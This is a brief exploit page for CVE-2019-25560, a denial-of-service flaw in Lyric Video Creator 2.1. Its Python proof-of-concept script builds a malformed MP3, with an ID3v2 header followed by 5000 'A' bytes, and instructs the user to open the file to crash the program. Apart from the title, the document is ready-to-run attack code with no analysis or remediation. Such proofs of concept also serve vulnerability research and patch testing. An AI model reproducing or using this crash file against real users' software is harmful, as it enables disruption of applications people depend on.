CVE-2019-25560 Lyric Video Creator拒绝服务漏洞

# PoC Code for CVE-2019-25560 # Generates a malformed MP3 file to trigger DoS in Lyric Video Creator 2.1 import struct def generate_exploit_mp3(filename="crash.mp3", buffer_size=5000): """ Creates a malformed MP3 file with an oversized buffer. Opening this file in Lyric Video Creator 2.1 triggers the crash. """ # Standard MP3 Header (ID3v2) # ID3v2 header: 'ID3' + version + flags + size header = b'ID3\x04\x00\x00\x00\x00\x00\00' # Oversized buffer payload (e.g., 'A' characters) payload = b'A' * buffer_size with open(filename, 'wb') as f: f.write(header + payload) print(f"[+] Exploit file '{filename}' generated.") print(f"[!] Open this file in Lyric Video Creator 2.1 to reproduce the CVE.") if __name__ == "__main__": generate_exploit_mp3()